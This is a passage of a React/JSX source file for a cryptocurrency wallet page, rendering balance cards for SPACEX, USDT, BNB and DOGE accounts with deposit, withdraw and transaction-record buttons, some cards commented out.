                        <span className=" text-sm text-gray-100 "><CountUp start={0} end={spacex_n} duration="1" decimals={6} /></span>
                        </div>
                        
                    </div>
                    <div className="mt-1 w-full h-14 mb-2 flex flex-row justify-start items-center gap-3">

                        <div onClick={()=>openDep("spacex")} class=" relative w-20 h-[22px] cursor-pointer overflow-hidden transition-all duration-300 select-none rounded-md">
                            <div class="absolute inset-0 bg-[#08111d]" >
                            </div>
                            <div class="absolute inset-0 border border-[#ff8c00]/40" >
                            </div>
                            <div class="relative z-10 h-full flex flex-col items-center justify-center">
                                <div class="text-[9px] uppercase tracking-[1px] text-gray-400">
                                     {t('asset.存入')}
                                </div>
                            </div>
                        </div>
                        <div onClick={()=>openTi("spacex")} class=" relative w-20 h-[22px] cursor-pointer overflow-hidden transition-all duration-300 select-none rounded-md">
                            <div class="absolute inset-0 bg-[#08111d]" >
                            </div>
                            <div class="absolute inset-0 border border-[#ff8c00]/40" >
                            </div>
                            <div class="relative z-10 h-full flex flex-col items-center justify-center">
                                <div class="text-[9px] uppercase tracking-[1px] text-gray-400">
                                    {t('asset.提取')}
                                </div>
                            </div>
                        </div>
                        <div onClick={()=>goLiushui("/record_spacex")} class=" relative w-20 h-[22px] cursor-pointer overflow-hidden transition-all duration-300 select-none rounded-md">
                            <div class="absolute inset-0 bg-[#08111d]" >
                            </div>
                            <div class="absolute inset-0 border border-[#ff8c00]/40" >
                            </div>
                            <div class="relative z-10 h-full flex flex-col items-center justify-center">
                                <div class="text-[9px] uppercase tracking-[1px] text-gray-400">
                                    {t('asset.记录')}
                                </div>
                            </div>
                        </div>

                        
                    </div>
                </div>

                <div className="mx-4  px-5  mt-7 flex flex-col probg1 h-[100px]">
                    {/* <div className="w-full h-5 mt-5 text-sm text-text-act">SPACEX</div> */}
                    <div className="w-full h-14 mt-3 flex flex-row items-center justify-start">
                        <img alt='rr' className=' mr-3' src={require('../../assets/icon/usdtlogo.png')} style={{"width":"35px"}}></img>
                        <div className=' w-20 flex flex-col justify-start'>
                            <span className="text-xs text-text-act">USDT</span>
                            <span className="text-[9px] text-gray-400">[{t('air.生态收益账户')}]</span>
                        </div>
                        <div className='  flex flex-col justify-start'>
                            <span className=" text-[9px] text-gray-400">{t('asset.余额')}：</span>
                        <span className=" text-sm text-gray-100 "><CountUp start={0} end={usdt_n} duration="1" decimals={6} /></span>
                        </div>
                        
                    </div>
                    <div className="mt-1 w-full h-14 mb-2 flex flex-row justify-start items-center gap-3">

                        <div onClick={()=>openDep("usdt")} class=" relative w-20 h-[22px] cursor-pointer overflow-hidden transition-all duration-300 select-none rounded-md">
                            <div class="absolute inset-0 bg-[#08111d]" >
                            </div>
                            <div class="absolute inset-0 border border-[#ff8c00]/40" >
                            </div>
                            <div class="relative z-10 h-full flex flex-col items-center justify-center">
                                <div class="text-[9px] uppercase tracking-[1px] text-gray-400">
                                     {t('asset.存入')}
                                </div>
                            </div>
                        </div>
                        <div onClick={()=>openTi("usdt")} class=" relative w-20 h-[22px] cursor-pointer overflow-hidden transition-all duration-300 select-none rounded-md">
                            <div class="absolute inset-0 bg-[#08111d]" >
                            </div>
                            <div class="absolute inset-0 border border-[#ff8c00]/40" >
                            </div>
                            <div class="relative z-10 h-full flex flex-col items-center justify-center">
                                <div class="text-[9px] uppercase tracking-[1px] text-gray-400">
                                    {t('asset.提取')}
                                </div>
                            </div>
                        </div>
                        <div onClick={()=>goLiushui("/record_usdt")} class=" relative w-20 h-[22px] cursor-pointer overflow-hidden transition-all duration-300 select-none rounded-md">
                            <div class="absolute inset-0 bg-[#08111d]" >
                            </div>
                            <div class="absolute inset-0 border border-[#ff8c00]/40" >
                            </div>
                            <div class="relative z-10 h-full flex flex-col items-center justify-center">
                                <div class="text-[9px] uppercase tracking-[1px] text-gray-400">
                                    {t('asset.记录')}
                                </div>
                            </div>
                        </div>

                        
                    </div>
                </div>

                
                <div className="mx-4  px-5  mt-4 flex flex-col probg1 h-[100px]">
                    
                    <div className="w-full h-14 mt-3 flex flex-row items-center justify-start">
                        <img alt='rr' className=' mr-3' src={require('../../assets/ipo/bnblogo.png')} style={{"width":"35px"}}></img>
                        <div className=' w-20 flex flex-col justify-start'>
                            <span className="text-xs text-text-act">BNB</span>
                            <span className="text-[9px] text-gray-400">[{t('air.生态收益账户')}]</span>
                        </div>
                        <div className='  flex flex-col justify-start'>
                            <span className=" text-[9px] text-gray-400">{t('asset.余额')}：</span>
                        <span className=" text-sm text-gray-100 "><CountUp start={0} end={bnb_n} duration="1" decimals={6} /></span>
                        </div>
                        
                    </div>
                    <div className="mt-1 w-full h-14 mb-2 flex flex-row justify-start items-center gap-3">

                        <div  class=" relative w-20 h-[22px] cursor-pointer overflow-hidden transition-all duration-300 select-none rounded-md">
                            <div class="absolute inset-0 bg-[#08111d]" >
                            </div>
                            <div class="absolute inset-0 border border-[#ff8c00]/40" >
                            </div>
                            <div class="relative z-10 h-full flex flex-col items-center justify-center">
                                <div class="text-[9px] uppercase tracking-[1px] text-gray-400">
                                    
                                </div>
                            </div>
                        </div>
                        <div onClick={()=>openTi("bnb")} class=" relative w-20 h-[22px] cursor-pointer overflow-hidden transition-all duration-300 select-none rounded-md">
                            <div class="absolute inset-0 bg-[#08111d]" >
                            </div>
                            <div class="absolute inset-0 border border-[#ff8c00]/40" >
                            </div>
                            <div class="relative z-10 h-full flex flex-col items-center justify-center">
                                <div class="text-[9px] uppercase tracking-[1px] text-gray-400">
                                    {t('asset.提取')}
                                </div>
                            </div>
                        </div>
                        <div onClick={()=>goLiushui("/record_bnb")} class=" relative w-20 h-[22px] cursor-pointer overflow-hidden transition-all duration-300 select-none rounded-md">
                            <div class="absolute inset-0 bg-[#08111d]" >
                            </div>
                            <div class="absolute inset-0 border border-[#ff8c00]/40" >
                            </div>
                            <div class="relative z-10 h-full flex flex-col items-center justify-center">
                                <div class="text-[9px] uppercase tracking-[1px] text-gray-400">
                                    {t('asset.记录')}
                                </div>
                            </div>
                        </div>

                        
                    </div>
                </div>

                <div className="mx-4  px-5  mt-7 flex flex-col probg1 h-[100px]">
                    {/* <div className="w-full h-5 mt-5 text-sm text-text-act">SPACEX</div> */}
                    <div className="w-full h-14 mt-3 flex flex-row items-center justify-start">
                        <img alt='rr' className=' mr-3' src={require('../../assets/ipo/dogelogo.png')} style={{"width":"35px"}}></img>
                        <div className=' w-20 flex flex-col justify-start'>
                            <span className="text-xs text-text-act">DOGE</span>
                            <span className="text-[9px] text-gray-400">[{t('air.生态收益账户')}]</span>
                        </div>
                        <div className='  flex flex-col justify-start'>
                            <span className=" text-[9px] text-gray-400">{t('asset.余额')}：</span>
                        <span className=" text-sm text-gray-100 "><CountUp start={0} end={doge_pledge_n} duration="1" decimals={6} /></span>
                        </div>
                        
                    </div>
                    <div className="mt-1 w-full h-14 mb-2 flex flex-row justify-start items-center gap-3">

                        <div  class=" relative w-20 h-[22px] cursor-pointer overflow-hidden transition-all duration-300 select-none rounded-md">
                            <div class="absolute inset-0 bg-[#08111d]" >
                            </div>
                            <div class="absolute inset-0 border border-[#ff8c00]/40" >
                            </div>
                            <div class="relative z-10 h-full flex flex-col items-center justify-center">
                                <div class="text-[9px] uppercase tracking-[1px] text-gray-400">
                                     {/* {t('asset.存入')} */}-
                                </div>
                            </div>
                        </div>
                        <div onClick={()=>openTi("doge_pledge")} class=" relative w-20 h-[22px] cursor-pointer overflow-hidden transition-all duration-300 select-none rounded-md">
                            <div class="absolute inset-0 bg-[#08111d]" >
                            </div>
                            <div class="absolute inset-0 border border-[#ff8c00]/40" >
                            </div>
                            <div class="relative z-10 h-full flex flex-col items-center justify-center">
                                <div class="text-[9px] uppercase tracking-[1px] text-gray-400">
                                    {t('asset.提取')}
                                </div>
                            </div>
                        </div>
                        <div onClick={()=>goLiushui("/record_doge_pledge")} class=" relative w-20 h-[22px] cursor-pointer overflow-hidden transition-all duration-300 select-none rounded-md">
                            <div class="absolute inset-0 bg-[#08111d]" >
                            </div>
                            <div class="absolute inset-0 border border-[#ff8c00]/40" >
                            </div>
                            <div class="relative z-10 h-full flex flex-col items-center justify-center">
                                <div class="text-[9px] uppercase tracking-[1px] text-gray-400">
                                    {t('asset.记录')}
                                </div>
                            </div>
                        </div>

                        
                    </div>
                </div>

                {/* <div className="mx-4  px-5  mt-7 flex flex-col probg1 h-[100px]">
                   
                    <div className="w-full h-14 mt-3 flex flex-row items-center justify-start">
                        <img alt='rr' className=' mr-3' src={require('../../assets/ipo/dogelogo.png')} style={{"width":"35px"}}></img>
                        <div className=' w-20 flex flex-col justify-start'>
                            <span className="text-xs text-text-act">DOGE</span>
                            <span className="text-[9px] text-gray-400">[{t('air.空投账户')}]</span>
                        </div>
                        <div className='  flex flex-col justify-start'>
                            <span className=" text-[9px] text-gray-400">{t('asset.余额')}：</span>
                        <span className=" text-sm text-gray-100 "><CountUp start={0} end={doge_n} duration="1" decimals={6} /></span>
                        </div>
                        
                    </div>
                    <div className="mt-1 w-full h-14 mb-2 flex flex-row justify-start items-center gap-3">

                        <div  class=" relative w-20 h-[22px] cursor-pointer overflow-hidden transition-all duration-300 select-none rounded-md">
                            <div class="absolute inset-0 bg-[#08111d]" >
                            </div>
                            <div class="absolute inset-0 border border-[#ff8c00]/40" >
                            </div>
                            <div class="relative z-10 h-full flex flex-col items-center justify-center">
                                <div class="text-[9px] uppercase tracking-[1px] text-gray-400">
                                     
                                </div>
                            </div>
                        </div>
                        <div onClick={()=>openTi("doge")} class=" relative w-20 h-[22px] cursor-pointer overflow-hidden transition-all duration-300 select-none rounded-md">
                            <div class="absolute inset-0 bg-[#08111d]" >
                            </div>
                            <div class="absolute inset-0 border border-[#ff8c00]/40" >
                            </div>
                            <div class="relative z-10 h-full flex flex-col items-center justify-center">
                                <div class="text-[9px] uppercase tracking-[1px] text-gray-400">
                                    {t('asset.提取')}
                                </div>
                            </div>
                        </div>
                        <div  class=" relative w-20 h-[22px] cursor-pointer overflow-hidden transition-all duration-300 select-none rounded-md">
                            <div class="absolute inset-0 bg-[#08111d]" >
                            </div>
                            <div class="absolute inset-0 border border-[#ff8c00]/40" >
                            </div>
                            <div class="relative z-10 h-full flex flex-col items-center justify-center">
                                <div class="text-[9px] uppercase tracking-[1px] text-gray-400">
                                    -
                                </div>
                            </div>
                        </div>

                        
                    </div>
                </div> */}

                

                {/* <div className="mx-4  px-5  mt-7 flex flex-col probg1 h-[100px]">
                    
                    <div className="w-full h-14 mt-3 flex flex-row items-center justify-start">
                        <img alt='rr' className=' mr-3' src={require('../../assets/ipo/logo1.png')} style={{"width":"35px"}}></img>
                        <div className=' w-20 flex flex-col justify-start'>
                            <span className="text-xs text-text-act">SPACEX</span>
                            <span className="text-[9px] text-gray-400">[{t('air.铸造账户')}]</span>
                        </div>
                        <div className='  flex flex-col justify-start'>
                            <span className=" text-[9px] text-gray-400">{t('asset.余额')}：</span>
                        <span className=" text-sm text-gray-100 "><CountUp start={0} end={spacex_mint_n} duration="1" decimals={6} /></span>
                        </div>
                        
                    </div>
                    <div className="mt-1 w-full h-14 mb-2 flex flex-row justify-start items-center gap-3">

                        <div  class=" relative w-20 h-[22px] cursor-pointer overflow-hidden transition-all duration-300 select-none rounded-md">
                            <div class="absolute inset-0 bg-[#08111d]" >
                            </div>
                            <div class="absolute inset-0 border border-[#ff8c00]/40" >
                            </div>
                            <div class="relative z-10 h-full flex flex-col items-center justify-center">
                                <div class="text-[9px] uppercase tracking-[1px] text-gray-400">
                                     -
                                </div>
                            </div>
                        </div>
                        <div onClick={()=>openTi("spacex_mint")} class=" relative w-20 h-[22px] cursor-pointer overflow-hidden transition-all duration-300 select-none rounded-md">
                            <div class="absolute inset-0 bg-[#08111d]" >
                            </div>
                            <div class="absolute inset-0 border border-[#ff8c00]/40" >
                            </div>
                            <div class="relative z-10 h-full flex flex-col items-center justify-center">
                                <div class="text-[9px] uppercase tracking-[1px] text-gray-400">
                                    {t('asset.提取')}
                                </div>
                            </div>
                        </div>
                        <div  class=" relative w-20 h-[22px] cursor-pointer overflow-hidden transition-all duration-300 select-none rounded-md">
                            <div class="absolute inset-0 bg-[#08111d]" >
                            </div>
                            <div class="absolute inset-0 border border-[#ff8c00]/40" >
                            </div>
                            <div class="relative z-10 h-full flex flex-col items-center justify-center">
                                <div class="text-[9px] uppercase tracking-[1px] text-gray-400">
                                    -
                                </div>
                            </div>
                        </div>

                        
                    </div>
                </div> */}

                {/* <div className="mx-4  px-5  mt-7 flex flex-col probg1 h-[100px]">
                    
                    <div className="w-full h-14 mt-3 flex flex-row items-center justify-start">
                        <img alt='rr' className=' mr-3' src={require('../../assets/ipo/logo1.png')} style={{"width":"35px"}}></img>
                        <div className=' w-20 flex flex-col justify-start'>
                            <span className="text-xs text-text-act">SPACEX</span>
                            <span className="text-[9px] text-gray-400">[{t('air.空投账户')}]</span>
                        </div>
                        <div className='  flex flex-col justify-start'>
                            <span className=" text-[9px] text-gray-400">{t('asset.余额')}：</span>
                        <span className=" text-sm text-gray-100 "><CountUp start={0} end={spacex_air_n} duration="1" decimals={6} /></span>
                        </div>
                        
                    </div>
                    <div className="mt-1 w-full h-14 mb-2 flex flex-row justify-start items-center gap-3">

                        <div  class=" relative w-20 h-[22px] cursor-pointer overflow-hidden transition-all duration-300 select-none rounded-md">
                            <div class="absolute inset-0 bg-[#08111d]" >
                            </div>
                            <div class="absolute inset-0 border border-[#ff8c00]/40" >
                            </div>
                            <div class="relative z-10 h-full flex flex-col items-center justify-center">
                                <div class="text-[9px] uppercase tracking-[1px] text-gray-400">
                                     -
                                </div>
                            </div>
                        </div>
                        <div onClick={()=>openTi("spacex_air")} class=" relative w-20 h-[22px] cursor-pointer overflow-hidden transition-all duration-300 select-none rounded-md">
                            <div class="absolute inset-0 bg-[#08111d]" >
                            </div>
                            <div class="absolute inset-0 border border-[#ff8c00]/40" >
                            </div>
                            <div class="relative z-10 h-full flex flex-col items-center justify-center">
                                <div class="text-[9px] uppercase tracking-[1px] text-gray-400">
                                    {t('asset.提取')}
                                </div>
                            </div>
                        </div>
                        <div  class=" relative w-20 h-[22px] cursor-pointer overflow-hidden transition-all duration-300 select-none rounded-md">
                            <div class="absolute inset-0 bg-[#08111d]" >
                            </div>
                            <div class="absolute inset-0 border border-[#ff8c00]/40" >
                            </div>
                            <div class="relative z-10 h-full flex flex-col items-center justify-center">
                                <div class="text-[9px] uppercase tracking-[1px] text-gray-400">
                                    -
                                </div>
                            </div>
                        </div>

                        
                    </div>
                </div> */}

                

  
                

                
                
                <div  className=' w-full h-[200px]'></div>
            </div>
           
            
                <Foot/>
        </>
    );
}

export default connect(mapStateToProps)(IndexTest1);
